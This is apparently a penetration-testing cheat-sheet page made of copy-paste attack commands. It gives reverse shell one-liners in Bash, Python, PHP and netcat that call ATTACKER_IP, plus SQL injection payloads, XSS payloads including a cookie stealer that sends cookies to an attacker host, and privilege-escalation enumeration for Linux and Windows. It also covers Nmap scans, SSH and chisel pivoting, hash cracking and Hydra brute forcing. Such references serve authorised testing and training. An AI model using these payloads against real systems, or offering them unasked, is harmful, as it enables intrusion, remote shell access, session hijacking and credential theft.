Security Cheat Sheets

Quick reference guides for penetration testing, web exploitation, privilege escalation, and more.

Reverse Shells

Shells

Common reverse shell one-liners for various languages and platforms.

Bash
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
PHP
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat
nc -e /bin/sh ATTACKER_IP PORT

Linux Privilege Escalation

PrivEsc

Quick enumeration commands for Linux privilege escalation.

SUID Binaries
find / -perm -4000 -type f 2>/dev/null
World-Writable Files
find / -writable -type f 2>/dev/null | grep -v proc
Sudo Permissions
sudo -l
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.*
Capabilities
getcap -r / 2>/dev/null

Nmap Scanning

Recon

Essential Nmap commands for network reconnaissance.

Full TCP Scan
nmap -sC -sV -p- -oA full_scan TARGET
UDP Scan (Top 100)
nmap -sU --top-ports 100 -oA udp_scan TARGET
Vulnerability Scan
nmap --script vuln -sV TARGET
Stealth Scan
nmap -sS -Pn -T2 --scan-delay 1s TARGET

SQL Injection

Web

Common SQL injection payloads and bypass techniques.

Authentication Bypass
' OR '1'='1' -- -
Union-Based
' UNION SELECT 1,2,3,user(),database() -- -
Error-Based
' AND extractvalue(1,concat(0x7e,(SELECT @@version))) -- -
sqlmap
sqlmap -u "URL?id=1" --dbs --batch --random-agent

XSS Payloads

Web

Cross-site scripting bypass techniques and payloads.

Basic Alert
<script>alert(document.domain)</script>
SVG Bypass
<svg onload=alert(1)>
IMG Onerror
<img src=x onerror=alert(1)>
Cookie Stealer
<script>new Image().src="http://ATTACKER/c="+document.cookie</script>

Network Pivoting

Network

SSH tunneling, port forwarding, and pivoting techniques.

SSH Local Port Forward
ssh -L LOCAL_PORT:TARGET:TARGET_PORT user@pivot
SSH Dynamic SOCKS Proxy
ssh -D 9050 -N user@pivot
Chisel Server
./chisel server -p 8000 --reverse
Chisel Client
./chisel client ATTACKER:8000 R:SOCKS

Password Cracking

Recon

Hash cracking with John the Ripper and Hashcat.

John with Wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Hashcat MD5
hashcat -m 0 -a 0 hashes.txt rockyou.txt
Hashcat NTLM
hashcat -m 1000 -a 0 hashes.txt rockyou.txt
Hydra SSH Brute
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://TARGET

Windows Privilege Escalation

PrivEsc

Windows enumeration and privilege escalation commands.

System Info
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Current User Privileges
whoami /priv
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated